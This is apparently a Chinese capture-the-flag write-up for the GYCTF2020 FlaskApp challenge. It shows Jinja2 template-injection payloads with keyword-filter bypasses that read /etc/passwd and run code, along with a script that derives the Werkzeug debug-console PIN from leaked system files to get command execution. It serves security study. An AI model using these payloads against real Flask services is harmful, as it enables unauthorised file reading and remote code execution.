[GYCTF2020]FlaskApp
flask的模板注入加一个debug模式下的命令执行
题目开局给的是一个base64的加解密网站,说明了是flask写的,hint界面在注释里面藏了一句PIN(我一开始还不知道是什么意思)
后来在解码处输入了一个错误的字符串,进入了debug界面,可以看到解码部分的源码
@app.route('/decode',methods=['POST','GET'])
def decode():
if request.values.get('text') :
text = request.values.get("text")
text_decode = base64.b64decode(text.encode())
tmp = "结果 : {0}".format(text_decode.decode())
if waf(tmp) :
flash("no no no !!")
return redirect(url_for('decode'))
res = render_template_string(tmp)
发现在debug模式下可以运行一个shell,但是要输入一个叫PIN码的东西,这个就是提示中出现的PIN了,每个机器的PIN码是由几个数据固定生成的,那么我们只要读取到对应的文件,自然就能计算出PIN从而任意命令执行
而这里又使用了模板渲染,自然可以测一下ssti,简单的{{8+8}}可以被计算即可证明存在模板注入。不过这里也提出了有Waf,就需要测一下waf禁用了什么。简单找几个payload试试,发现os,flag和popen,system,import之类的常用命令执行的字段被禁用了,不过就这种过滤还是很容易绕过的,毕竟还是得用ssti读文件去计算PIN码,网上找几个payload就可以了
ssti payload
不过python不同版本的payload不一定通用,顺便也收集一些
python3.7:
读文件{{().__class__.__bases__[0].__subclasses__()[75].__init__.__globals__.__builtins__['open']('/etc/passwd').read()}}
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('txt.galf_eht_si_siht/'[::-1],'r').read() }}{% endif %}{% endfor %}
字符串切片方式翻转字符串绕过检测
代码执行{{''.__class__.__bases__[0].__subclasses__()[75].__init__.__globals__['__builtins__']['__imp'+'ort__']('o'+'s').listdir('/')}}
扫目录,结果就是发现了flag位置就可以直接读取了,是一个非预期
python2.7
读文件{{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}
代码执行
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/tmp/evalcode', 'w').write('evalcode') }}
{{ config.from_pyfile('/tmp/evalcode') }}
各种绕过payload
https://p0sec.net/index.php/archives/120/
预期解
需要六个数据来计算PIN码
1.运行app的用户名,读/etc/passwd
2.module name 一般固定为flask.app
3.getattr(app, "\_\_name\_\_", app.\_\_class\_\_.\_\_name\_\_)
的结果。就是Flask
4.flask库下app.py的绝对路径,不是当前运行的app.py的路径,在debug模式下报错就能直接看见,该题为/usr/local/lib/python3.7/site-packages/flask/app.py
5.当前网络的mac地址的十进制数。通过文件/sys/class/net/eth0/address读取,eth0为当前使用的网卡,如果有多个网卡数字可能会变,这里为02:42:ae:00:c3:58
,转十进制为 2485410382680
6.机器的id
对于非docker机每一个机器都会有自已唯一的id,linux的id一般存放在/etc/machine-id或/proc/sys/kernel/random/boot_i,有的系统没有这两个文件,windows的id获取跟linux也不同。对于docker机则读取/proc/self/cgroup,序列号为1那行1:name=systemd:/docker/210b2177689514627fab120347f7d1ea1e986bed6a9ef57504e2e3ac22e38c3c
全部凑齐之后就可以计算PIN了
import hashlib
from itertools import chain
probably_public_bits = [
'flaskweb',
'flask.app',
'Flask',
'/usr/local/lib/python3.7/site-packages/flask/app.py',
]
private_bits = [
'2485410382680',
'210b2177689514627fab120347f7d1ea1e986bed6a9ef57504e2e3ac22e38c3c'
]
h = hashlib.md5()
for bit in chain(probably_public_bits, private_bits):
if not bit:
continue
if isinstance(bit, str):
bit = bit.encode('utf-8')
h.update(bit)
h.update(b'cookiesalt')
cookie_name = '__wzd' + h.hexdigest()[:20]
num = None
if num is None:
h.update(b'pinsalt')
num = ('%09d' % int(h.hexdigest(), 16))[:9]
rv =None
if rv is None:
for group_size in 5, 4, 3:
if len(num) % group_size == 0:
rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
for x in range(0, len(num), group_size))
break
else:
rv = num
print(rv)
算出PIN为610-413-249,就可以为所欲为了,不过PIN最多10亿种可能,爆破有有可能是一种办法?